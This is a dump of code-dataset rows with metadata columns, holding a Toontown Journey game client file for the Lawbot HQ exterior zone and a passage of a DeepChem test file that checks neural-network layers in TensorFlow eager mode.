| 26.52381 | 78 | 0.653501 | 300 | 2,228 | 4.736667 | 0.33 | 0.038705 | 0.023223 | 0.044335 | 0.283603 | 0.283603 | 0.262491 | 0.214638 | 0.140746 | 0.07741 | 0 | 0.003656 | 0.263465 | 2,228 | 83 | 79 | 26.843373 | 0.862279 | 0.386445 | 0 | 0.117647 | 0 | 0 | 0.110121 | 0 | 0 | 0 | 0 | 0.024096 | 0 | 1 | 0.117647 | false | 0 | 0.147059 | 0 | 0.382353 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c4e7db74b0a777f921aa87993b291e973a2d6ac3 | 1,652 | py | Python | toontown/coghq/LawbotHQExterior.py | journeyfan/toontown-journey | 7a4db507e5c1c38a014fc65588086d9655aaa5b4 | [
"MIT"
] | 1 | 2020-09-27T22:12:47.000Z | 2020-09-27T22:12:47.000Z | toontown/coghq/LawbotHQExterior.py | journeyfan/toontown-journey | 7a4db507e5c1c38a014fc65588086d9655aaa5b4 | [
"MIT"
] | null | null | null | toontown/coghq/LawbotHQExterior.py | journeyfan/toontown-journey | 7a4db507e5c1c38a014fc65588086d9655aaa5b4 | [
"MIT"
] | 2 | 2020-09-26T20:37:18.000Z | 2020-11-15T20:55:33.000Z | from direct.directnotify import DirectNotifyGlobal
from direct.fsm import ClassicFSM, State
from direct.fsm import State
from pandac.PandaModules import *
from toontown.battle import BattlePlace
from toontown.building import Elevator
from toontown.coghq import CogHQExterior
from toontown.dna.DNAParser import loadDNAFileAI
from libpandadna import DNAStorage
from toontown.hood import ZoneUtil
from toontown.toonbase import ToontownGlobals
class LawbotHQExterior(CogHQExterior.CogHQExterior):
notify = DirectNotifyGlobal.directNotify.newCategory('LawbotHQExterior')
def enter(self, requestStatus):
CogHQExterior.CogHQExterior.enter(self, requestStatus)
# Load the CogHQ DNA file:
dnaStore = DNAStorage()
dnaFileName = self.genDNAFileName(self.zoneId)
loadDNAFileAI(dnaStore, dnaFileName)
# Collect all of the vis group zone IDs:
self.zoneVisDict = {}
for i in range(dnaStore.getNumDNAVisGroupsAI()):
groupFullName = dnaStore.getDNAVisGroupName(i)
visGroup = dnaStore.getDNAVisGroupAI(i)
visZoneId = int(base.cr.hoodMgr.extractGroupName(groupFullName))
visZoneId = ZoneUtil.getTrueZoneId(visZoneId, self.zoneId)
visibles = []
for i in range(visGroup.getNumVisibles()):
visibles.append(int(visGroup.getVisible(i)))
visibles.append(ZoneUtil.getBranchZone(visZoneId))
self.zoneVisDict[visZoneId] = visibles
# Next, we want interest in all vis groups due to this being a Cog HQ:
base.cr.sendSetZoneMsg(self.zoneId, list(self.zoneVisDict.values())[0])
| 41.3 | 79 | 0.72276 | 172 | 1,652 | 6.94186 | 0.5 | 0.060302 | 0.021776 | 0.031826 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.000759 | 0.202179 | 1,652 | 39 | 80 | 42.358974 | 0.905159 | 0.079903 | 0 | 0 | 0 | 0 | 0.010554 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.366667 | 0 | 0.466667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
c4f84b78cd23bfc6c4e94d2d3b58c3a8e6dd5d94 | 34,172 | py | Python | deepchem/models/tensorgraph/tests/test_layers_eager.py | avimanyu786/deepchem | c5a7c6fff0597b5d896c865efdacec4fa75b00c6 | [
"MIT"
] | null | null | null | deepchem/models/tensorgraph/tests/test_layers_eager.py | avimanyu786/deepchem | c5a7c6fff0597b5d896c865efdacec4fa75b00c6 | [
"MIT"
] | null | null | null | deepchem/models/tensorgraph/tests/test_layers_eager.py | avimanyu786/deepchem | c5a7c6fff0597b5d896c865efdacec4fa75b00c6 | [
"MIT"
] | 1 | 2019-05-19T14:22:32.000Z | 2019-05-19T14:22:32.000Z | import deepchem as dc
import numpy as np
import tensorflow as tf
import deepchem.models.tensorgraph.layers as layers
from tensorflow.python.eager import context
from tensorflow.python.framework import test_util
class TestLayersEager(test_util.TensorFlowTestCase):
"""
Test that layers function in eager mode.
"""
def test_conv_1d(self):
"""Test invoking Conv1D in eager mode."""
with context.eager_mode():
width = 5
in_channels = 2
filters = 3
kernel_size = 2
batch_size = 10
input = np.random.rand(batch_size, width, in_channels).astype(np.float32)
layer = layers.Conv1D(filters, kernel_size)
result = layer(input)
self.assertEqual(result.shape[0], batch_size)
self.assertEqual(result.shape[2], filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv1D(filters, kernel_size)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_dense(self):
"""Test invoking Dense in eager mode."""
with context.eager_mode():
in_dim = 2
out_dim = 3
batch_size = 10
input = np.random.rand(batch_size, in_dim).astype(np.float32)
layer = layers.Dense(out_dim)
result = layer(input)
assert result.shape == (batch_size, out_dim)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Dense(out_dim)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_highway(self):
"""Test invoking Highway in eager mode."""
with context.eager_mode():
width = 5
batch_size = 10
input = np.random.rand(batch_size, width).astype(np.float32)
layer = layers.Highway()
result = layer(input)
assert result.shape == (batch_size, width)
assert len(layer.trainable_variables) == 4
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Highway()
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_flatten(self):
"""Test invoking Flatten in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10, 4).astype(np.float32)
result = layers.Flatten()(input)
assert result.shape == (5, 40)
def test_reshape(self):
"""Test invoking Reshape in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10, 4).astype(np.float32)
result = layers.Reshape((100, 2))(input)
assert result.shape == (100, 2)
def test_cast(self):
"""Test invoking Cast in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 3)
result = layers.Cast(dtype=tf.float32)(input)
assert result.dtype == tf.float32
def test_squeeze(self):
"""Test invoking Squeeze in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 1, 4).astype(np.float32)
result = layers.Squeeze()(input)
assert result.shape == (5, 4)
def test_transpose(self):
"""Test invoking Transpose in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10, 4).astype(np.float32)
result = layers.Transpose((1, 2, 0))(input)
assert result.shape == (10, 4, 5)
def test_combine_mean_std(self):
"""Test invoking CombineMeanStd in eager mode."""
with context.eager_mode():
mean = np.random.rand(5, 3).astype(np.float32)
std = np.random.rand(5, 3).astype(np.float32)
layer = layers.CombineMeanStd(training_only=True, noise_epsilon=0.01)
result1 = layer(mean, std, training=False)
assert np.array_equal(result1, mean) # No noise in test mode
result2 = layer(mean, std, training=True)
assert not np.array_equal(result2, mean)
assert np.allclose(result2, mean, atol=0.1)
def test_repeat(self):
"""Test invoking Repeat in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 4).astype(np.float32)
result = layers.Repeat(3)(input)
assert result.shape == (5, 3, 4)
assert np.array_equal(result[:, 0, :], result[:, 1, :])
def test_gather(self):
"""Test invoking Gather in eager mode."""
with context.eager_mode():
input = np.random.rand(5).astype(np.float32)
indices = [[1], [3]]
result = layers.Gather()(input, indices)
assert np.array_equal(result, [input[1], input[3]])
def test_gru(self):
"""Test invoking GRU in eager mode."""
with context.eager_mode():
batch_size = 10
n_hidden = 7
in_channels = 4
n_steps = 6
input = np.random.rand(batch_size, n_steps,
in_channels).astype(np.float32)
layer = layers.GRU(n_hidden, batch_size)
result, state = layer(input)
assert result.shape == (batch_size, n_steps, n_hidden)
assert len(layer.trainable_variables) == 3
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.GRU(n_hidden, batch_size)
result2, state2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3, state3 = layer(input)
assert np.allclose(result, result3)
# But if we specify a different starting state, that should produce a
# different result.
result4, state4 = layer(input, initial_state=state3)
assert not np.allclose(result, result4)
def test_lstm(self):
"""Test invoking LSTM in eager mode."""
with context.eager_mode():
batch_size = 10
n_hidden = 7
in_channels = 4
n_steps = 6
input = np.random.rand(batch_size, n_steps,
in_channels).astype(np.float32)
layer = layers.LSTM(n_hidden, batch_size)
result, state = layer(input)
assert result.shape == (batch_size, n_steps, n_hidden)
assert len(layer.trainable_variables) == 3
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.LSTM(n_hidden, batch_size)
result2, state2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3, state3 = layer(input)
assert np.allclose(result, result3)
# But if we specify a different starting state, that should produce a
# different result.
result4, state4 = layer(input, initial_state=state3)
assert not np.allclose(result, result4)
def test_time_series_dense(self):
"""Test invoking TimeSeriesDense in eager mode."""
with context.eager_mode():
in_dim = 2
out_dim = 3
n_steps = 6
batch_size = 10
input = np.random.rand(batch_size, n_steps, in_dim).astype(np.float32)
layer = layers.TimeSeriesDense(out_dim)
result = layer(input)
assert result.shape == (batch_size, n_steps, out_dim)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.TimeSeriesDense(out_dim)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_l1_loss(self):
"""Test invoking L1Loss in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
result = layers.L1Loss()(input1, input2)
expected = np.mean(np.abs(input1 - input2), axis=1)
assert np.allclose(result, expected)
def test_l2_loss(self):
"""Test invoking L2Loss in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
result = layers.L2Loss()(input1, input2)
expected = np.mean((input1 - input2)**2, axis=1)
assert np.allclose(result, expected)
def test_softmax(self):
"""Test invoking SoftMax in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.SoftMax()(input)
expected = tf.nn.softmax(input)
assert np.allclose(result, expected)
def test_sigmoid(self):
"""Test invoking Sigmoid in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.Sigmoid()(input)
expected = tf.nn.sigmoid(input)
assert np.allclose(result, expected)
def test_relu(self):
"""Test invoking ReLU in eager mode."""
with context.eager_mode():
input = np.random.normal(size=(5, 10)).astype(np.float32)
result = layers.ReLU()(input)
expected = tf.nn.relu(input)
assert np.allclose(result, expected)
def test_concat(self):
"""Test invoking Concat in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 4).astype(np.float32)
result = layers.Concat()(input1, input2)
assert result.shape == (5, 14)
assert np.array_equal(input1, result[:, :10])
assert np.array_equal(input2, result[:, 10:])
def test_stack(self):
"""Test invoking Stack in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 4).astype(np.float32)
input2 = np.random.rand(5, 4).astype(np.float32)
result = layers.Stack()(input1, input2)
assert result.shape == (5, 2, 4)
assert np.array_equal(input1, result[:, 0, :])
assert np.array_equal(input2, result[:, 1, :])
def test_constant(self):
"""Test invoking Constant in eager mode."""
with context.eager_mode():
value = np.random.rand(5, 4).astype(np.float32)
result = layers.Constant(value)()
assert np.array_equal(result, value)
def test_variable(self):
"""Test invoking Variable in eager mode."""
with context.eager_mode():
value = np.random.rand(5, 4).astype(np.float32)
layer = layers.Variable(value)
result = layer()
assert np.array_equal(result.numpy(), value)
assert len(layer.trainable_variables) == 1
def test_add(self):
"""Test invoking Add in eager mode."""
with context.eager_mode():
result = layers.Add()([1, 2], [3, 4])
assert np.array_equal(result, [4, 6])
def test_multiply(self):
"""Test invoking Multiply in eager mode."""
with context.eager_mode():
result = layers.Multiply()([1, 2], [3, 4])
assert np.array_equal(result, [3, 8])
def test_divide(self):
"""Test invoking Divide in eager mode."""
with context.eager_mode():
result = layers.Divide()([1, 2], [2, 5])
assert np.allclose(result, [0.5, 0.4])
def test_log(self):
"""Test invoking Log in eager mode."""
with context.eager_mode():
result = layers.Log()(2.5)
assert np.allclose(result, np.log(2.5))
def test_exp(self):
"""Test invoking Exp in eager mode."""
with context.eager_mode():
result = layers.Exp()(2.5)
assert np.allclose(result, np.exp(2.5))
def test_interatomic_l2_distances(self):
"""Test invoking InteratomicL2Distances in eager mode."""
with context.eager_mode():
atoms = 5
neighbors = 2
coords = np.random.rand(atoms, 3)
neighbor_list = np.random.randint(0, atoms, size=(atoms, neighbors))
layer = layers.InteratomicL2Distances(atoms, neighbors, 3)
result = layer(coords, neighbor_list)
assert result.shape == (atoms, neighbors)
for atom in range(atoms):
for neighbor in range(neighbors):
delta = coords[atom] - coords[neighbor_list[atom, neighbor]]
dist2 = np.dot(delta, delta)
assert np.allclose(dist2, result[atom, neighbor])
def test_sparse_softmax_cross_entropy(self):
"""Test invoking SparseSoftMaxCrossEntropy in eager mode."""
with context.eager_mode():
batch_size = 10
n_features = 5
logits = np.random.rand(batch_size, n_features).astype(np.float32)
labels = np.random.rand(batch_size).astype(np.int32)
result = layers.SparseSoftMaxCrossEntropy()(labels, logits)
expected = tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=labels, logits=logits)
assert np.allclose(result, expected)
def test_softmax_cross_entropy(self):
"""Test invoking SoftMaxCrossEntropy in eager mode."""
with context.eager_mode():
batch_size = 10
n_features = 5
logits = np.random.rand(batch_size, n_features).astype(np.float32)
labels = np.random.rand(batch_size, n_features).astype(np.float32)
result = layers.SoftMaxCrossEntropy()(labels, logits)
expected = tf.nn.softmax_cross_entropy_with_logits_v2(
labels=labels, logits=logits)
assert np.allclose(result, expected)
def test_sigmoid_cross_entropy(self):
"""Test invoking SigmoidCrossEntropy in eager mode."""
with context.eager_mode():
batch_size = 10
n_features = 5
logits = np.random.rand(batch_size, n_features).astype(np.float32)
labels = np.random.randint(0, 2,
(batch_size, n_features)).astype(np.float32)
result = layers.SigmoidCrossEntropy()(labels, logits)
expected = tf.nn.sigmoid_cross_entropy_with_logits(
labels=labels, logits=logits)
assert np.allclose(result, expected)
def test_reduce_mean(self):
"""Test invoking ReduceMean in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.ReduceMean(axis=1)(input)
assert result.shape == (5,)
assert np.allclose(result, np.mean(input, axis=1))
def test_reduce_max(self):
"""Test invoking ReduceMax in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.ReduceMax(axis=1)(input)
assert result.shape == (5,)
assert np.allclose(result, np.max(input, axis=1))
def test_reduce_sum(self):
"""Test invoking ReduceSum in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.ReduceSum(axis=1)(input)
assert result.shape == (5,)
assert np.allclose(result, np.sum(input, axis=1))
def test_reduce_square_difference(self):
"""Test invoking ReduceSquareDifference in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
result = layers.ReduceSquareDifference(axis=1)(input1, input2)
assert result.shape == (5,)
assert np.allclose(result, np.mean((input1 - input2)**2, axis=1))
def test_conv_2d(self):
"""Test invoking Conv2D in eager mode."""
with context.eager_mode():
length = 4
width = 5
in_channels = 2
filters = 3
kernel_size = 2
batch_size = 10
input = np.random.rand(batch_size, length, width,
in_channels).astype(np.float32)
layer = layers.Conv2D(filters, kernel_size=kernel_size)
result = layer(input)
assert result.shape == (batch_size, length, width, filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv2D(filters, kernel_size=kernel_size)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_conv_3d(self):
"""Test invoking Conv3D in eager mode."""
with context.eager_mode():
length = 4
width = 5
depth = 6
in_channels = 2
filters = 3
kernel_size = 2
batch_size = 10
input = np.random.rand(batch_size, length, width, depth,
in_channels).astype(np.float32)
layer = layers.Conv3D(filters, kernel_size=kernel_size)
result = layer(input)
assert result.shape == (batch_size, length, width, depth, filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv3D(filters, kernel_size=kernel_size)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_conv_2d_transpose(self):
"""Test invoking Conv2DTranspose in eager mode."""
with context.eager_mode():
length = 4
width = 5
in_channels = 2
filters = 3
kernel_size = 2
stride = 2
batch_size = 10
input = np.random.rand(batch_size, length, width,
in_channels).astype(np.float32)
layer = layers.Conv2DTranspose(
filters, kernel_size=kernel_size, stride=stride)
result = layer(input)
assert result.shape == (batch_size, length * stride, width * stride,
filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv2DTranspose(
filters, kernel_size=kernel_size, stride=stride)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_conv_3d_transpose(self):
"""Test invoking Conv3DTranspose in eager mode."""
with context.eager_mode():
length = 4
width = 5
depth = 6
in_channels = 2
filters = 3
kernel_size = 2
stride = 2
batch_size = 10
input = np.random.rand(batch_size, length, width, depth,
in_channels).astype(np.float32)
layer = layers.Conv3DTranspose(
filters, kernel_size=kernel_size, stride=stride)
result = layer(input)
assert result.shape == (batch_size, length * stride, width * stride,
depth * stride, filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv3DTranspose(
filters, kernel_size=kernel_size, stride=stride)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_max_pool_1d(self):
"""Test invoking MaxPool1D in eager mode."""
with context.eager_mode():
input = np.random.rand(4, 6, 8).astype(np.float32)
result = layers.MaxPool1D(strides=2)(input)
assert result.shape == (4, 3, 8)
def test_max_pool_2d(self):
"""Test invoking MaxPool2D in eager mode."""
with context.eager_mode():
input = np.random.rand(2, 4, 6, 8).astype(np.float32)
result = layers.MaxPool2D()(input)
assert result.shape == (2, 2, 3, 8)
def test_max_pool_3d(self):
"""Test invoking MaxPool3D in eager mode."""
with context.eager_mode():
input = np.random.rand(2, 4, 6, 8, 2).astype(np.float32)
result = layers.MaxPool3D()(input)
assert result.shape == (2, 2, 3, 4, 2)
def test_graph_conv(self):
"""Test invoking GraphConv in eager mode."""
with context.eager_mode():
out_channels = 2
n_atoms = 4 # In CCC and C, there are 4 atoms
raw_smiles = ['CCC', 'C']
import rdkit
mols = [rdkit.Chem.MolFromSmiles(s) for s in raw_smiles]
featurizer = dc.feat.graph_features.ConvMolFeaturizer()
mols = featurizer.featurize(mols)
multi_mol = dc.feat.mol_graphs.ConvMol.agglomerate_mols(mols)
atom_features = multi_mol.get_atom_features().astype(np.float32)
degree_slice = multi_mol.deg_slice
membership = multi_mol.membership
deg_adjs = multi_mol.get_deg_adjacency_lists()[1:]
args = [atom_features, degree_slice, membership] + deg_adjs
layer = layers.GraphConv(out_channels)
result = layer(*args)
assert result.shape == (n_atoms, out_channels)
assert len(layer.trainable_variables) == 2 * layer.num_deg
def test_graph_pool(self):
"""Test invoking GraphPool in eager mode."""
with context.eager_mode():
n_atoms = 4 # In CCC and C, there are 4 atoms
raw_smiles = ['CCC', 'C']
import rdkit
mols = [rdkit.Chem.MolFromSmiles(s) for s in raw_smiles]
featurizer = dc.feat.graph_features.ConvMolFeaturizer()
mols = featurizer.featurize(mols)
multi_mol = dc.feat.mol_graphs.ConvMol.agglomerate_mols(mols)
atom_features = multi_mol.get_atom_features().astype(np.float32)
degree_slice = multi_mol.deg_slice
membership = multi_mol.membership
deg_adjs = multi_mol.get_deg_adjacency_lists()[1:]
args = [atom_features, degree_slice, membership] + deg_adjs
result = layers.GraphPool()(*args)
assert result.shape[0] == n_atoms
# TODO What should shape[1] be? It's not documented.
def test_graph_gather(self):
"""Test invoking GraphGather in eager mode."""
with context.eager_mode():
batch_size = 2
n_features = 75
n_atoms = 4 # In CCC and C, there are 4 atoms
raw_smiles = ['CCC', 'C']
import rdkit
mols = [rdkit.Chem.MolFromSmiles(s) for s in raw_smiles]
featurizer = dc.feat.graph_features.ConvMolFeaturizer()
mols = featurizer.featurize(mols)
multi_mol = dc.feat.mol_graphs.ConvMol.agglomerate_mols(mols)
atom_features = multi_mol.get_atom_features().astype(np.float32)
degree_slice = multi_mol.deg_slice
membership = multi_mol.membership
deg_adjs = multi_mol.get_deg_adjacency_lists()[1:]
args = [atom_features, degree_slice, membership] + deg_adjs
result = layers.GraphGather(batch_size)(*args)
# TODO(rbharath): Why is it 2*n_features instead of n_features?
assert result.shape == (batch_size, 2 * n_features)
def test_lstm_step(self):
"""Test invoking LSTMStep in eager mode."""
with context.eager_mode():
max_depth = 5
n_test = 5
n_feat = 10
y = np.random.rand(n_test, 2 * n_feat).astype(np.float32)
state_zero = np.random.rand(n_test, n_feat).astype(np.float32)
state_one = np.random.rand(n_test, n_feat).astype(np.float32)
layer = layers.LSTMStep(n_feat, 2 * n_feat)
result = layer(y, state_zero, state_one)
h_out, h_copy_out, c_out = (result[0], result[1][0], result[1][1])
assert h_out.shape == (n_test, n_feat)
assert h_copy_out.shape == (n_test, n_feat)
assert c_out.shape == (n_test, n_feat)
assert len(layer.trainable_variables) == 3
def test_attn_lstm_embedding(self):
"""Test invoking AttnLSTMEmbedding in eager mode."""
with context.eager_mode():
max_depth = 5
n_test = 5
n_support = 11
n_feat = 10
test = np.random.rand(n_test, n_feat).astype(np.float32)
support = np.random.rand(n_support, n_feat).astype(np.float32)
layer = layers.AttnLSTMEmbedding(n_test, n_support, n_feat, max_depth)
test_out, support_out = layer(test, support)
assert test_out.shape == (n_test, n_feat)
assert support_out.shape == (n_support, n_feat)
assert len(layer.trainable_variables) == 7
def test_iter_ref_lstm_embedding(self):
"""Test invoking AttnLSTMEmbedding in eager mode."""
with context.eager_mode():
max_depth = 5
n_test = 5
n_support = 11
n_feat = 10
test = np.random.rand(n_test, n_feat).astype(np.float32)
support = np.random.rand(n_support, n_feat).astype(np.float32)
layer = layers.IterRefLSTMEmbedding(n_test, n_support, n_feat, max_depth)
test_out, support_out = layer(test, support)
assert test_out.shape == (n_test, n_feat)
assert support_out.shape == (n_support, n_feat)
assert len(layer.trainable_variables) == 12
def test_batch_norm(self):
"""Test invoking BatchNorm in eager mode."""
with context.eager_mode():
batch_size = 10
n_features = 5
input = np.random.rand(batch_size, n_features).astype(np.float32)
layer = layers.BatchNorm()
result = layer(input)
assert result.shape == (batch_size, n_features)
assert len(layer.trainable_variables) == 2
def test_weighted_error(self):
"""Test invoking WeightedError in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
result = layers.WeightedError()(input1, input2)
expected = np.sum(input1 * input2)
assert np.allclose(result, expected)
def test_vina_free_energy(self):
"""Test invoking VinaFreeEnergy in eager mode."""
with context.eager_mode():
n_atoms = 5
m_nbrs = 1
ndim = 3
nbr_cutoff = 1
start = 0
stop = 4
X = np.random.rand(n_atoms, ndim).astype(np.float32)
Z = np.random.randint(0, 2, (n_atoms)).astype(np.float32)
layer = layers.VinaFreeEnergy(n_atoms, m_nbrs, ndim, nbr_cutoff, start,
stop)
result = layer(X, Z)
assert len(layer.trainable_variables) == 6
assert result.shape == tuple()
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.VinaFreeEnergy(n_atoms, m_nbrs, ndim, nbr_cutoff, start,
stop)
result2 = layer2(X, Z)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(X, Z)
assert np.allclose(result, result3)
def test_weighted_linear_combo(self):
"""Test invoking WeightedLinearCombo in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
layer = layers.WeightedLinearCombo()
result = layer(input1, input2)
assert len(layer.trainable_variables) == 2
expected = input1 * layer.trainable_variables[0] + input2 * layer.trainable_variables[1]
assert np.allclose(result, expected)
def test_neighbor_list(self):
"""Test invoking NeighborList in eager mode."""
with context.eager_mode():
N_atoms = 5
start = 0
stop = 12
nbr_cutoff = 3
ndim = 3
M_nbrs = 2
coords = start + np.random.rand(N_atoms, ndim) * (stop - start)
coords = tf.cast(tf.stack(coords), tf.float32)
layer = layers.NeighborList(N_atoms, M_nbrs, ndim, nbr_cutoff, start,
stop)
result = layer(coords)
assert result.shape == (N_atoms, M_nbrs)
def test_dropout(self):
"""Test invoking Dropout in eager mode."""
with context.eager_mode():
rate = 0.5
input = np.random.rand(5, 10).astype(np.float32)
layer = layers.Dropout(rate)
result1 = layer(input, training=False)
assert np.allclose(result1, input)
result2 = layer(input, training=True)
assert not np.allclose(result2, input)
nonzero = result2.numpy() != 0
assert np.allclose(result2.numpy()[nonzero], input[nonzero] / rate)
def test_atomic_convolution(self):
"""Test invoking AtomicConvolution in eager mode."""
with context.eager_mode():
batch_size = 4
max_atoms = 5
max_neighbors = 2
dimensions = 3
params = [[5.0, 2.0, 0.5], [10.0, 2.0, 0.5]]
input1 = np.random.rand(batch_size, max_atoms,
dimensions).astype(np.float32)
input2 = np.random.randint(
max_atoms, size=(batch_size, max_atoms, max_neighbors))
input3 = np.random.randint(
1, 10, size=(batch_size, max_atoms, max_neighbors))
layer = layers.AtomicConvolution(radial_params=params)
result = layer(input1, input2, input3)
assert result.shape == (batch_size, max_atoms, len(params))
assert len(layer.trainable_variables) == 3
def test_alpha_share_layer(self):
"""Test invoking AlphaShareLayer in eager mode."""
with context.eager_mode():
batch_size = 10
length = 6
input1 = np.random.rand(batch_size, length).astype(np.float32)
input2 = np.random.rand(batch_size, length).astype(np.float32)
layer = layers.AlphaShareLayer()
result = layer(input1, input2)
assert input1.shape == result[0].shape
assert input2.shape == result[1].shape
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.AlphaShareLayer()
result2 = layer2(input1, input2)
assert not np.allclose(result[0], result2[0])
assert not np.allclose(result[1], result2[1])
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input1, input2)
assert np.allclose(result[0], result3[0])
assert np.allclose(result[1], result3[1])
def test_sluice_loss(self):
"""Test invoking SluiceLoss in eager mode."""
with context.eager_mode():
input1 = np.ones((3, 4)).astype(np.float32)
input2 = np.ones((2, 2)).astype(np.float32)
result = layers.SluiceLoss()(input1, input2)
assert np.allclose(result, 40.0)
def test_beta_share(self):
"""Test invoking BetaShare in eager mode."""
with context.eager_mode():
batch_size = 10
length = 6
input1 = np.random.rand(batch_size, length).astype(np.float32)
input2 = np.random.rand(batch_size, length).astype(np.float32)
layer = layers.BetaShare()
result = layer(input1, input2)
assert input1.shape == result.shape
assert input2.shape == result.shape
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.BetaShare()
result2 = layer2(input1, input2)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input1, input2)
assert np.allclose(result, result3)
def test_ani_feat(self):
"""Test invoking ANIFeat in eager mode."""
with context.eager_mode():
batch_size = 10
max_atoms = 5
input = np.random.rand(batch_size, max_atoms, 4).astype(np.float32)
layer = layers.ANIFeat(max_atoms=max_atoms)
result = layer(input)
# TODO What should the output shape be? It's not documented, and there
# are no other test cases for it.
def test_graph_embed_pool_layer(self):
"""Test invoking GraphEmbedPoolLayer in eager mode."""
with context.eager_mode():
V = np.random.uniform(size=(10, 100, 50)).astype(np.float32)
adjs = np.random.uniform(size=(10, 100, 5, 100)).astype(np.float32)
layer = layers.GraphEmbedPoolLayer(num_vertices=6)
result = layer(V, adjs)
assert result[0].shape == (10, 6, 50)
assert result[1].shape == (10, 6, 5, 6)
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.GraphEmbedPoolLayer(num_vertices=6)
result2 = layer2(V, adjs)
assert not np.allclose(result[0], result2[0])
assert not np.allclose(result[1], result2[1])
# But evaluating the first layer again should produce the same result as before.
result3 = layer(V, adjs)
assert np.allclose(result[0], result3[0])
assert np.allclose(result[1], result3[1])
def test_graph_cnn(self):
"""Test invoking GraphCNN in eager mode."""
with context.eager_mode():
V = np.random.uniform(size=(10, 100, 50)).astype(np.float32)
adjs = np.random.uniform(size=(10, 100, 5, 100)).astype(np.float32)
layer = layers.GraphCNN(num_filters=6)
result = layer(V, adjs)
assert result.shape == (10, 100, 6)
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.GraphCNN(num_filters=6)
result2 = layer2(V, adjs)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
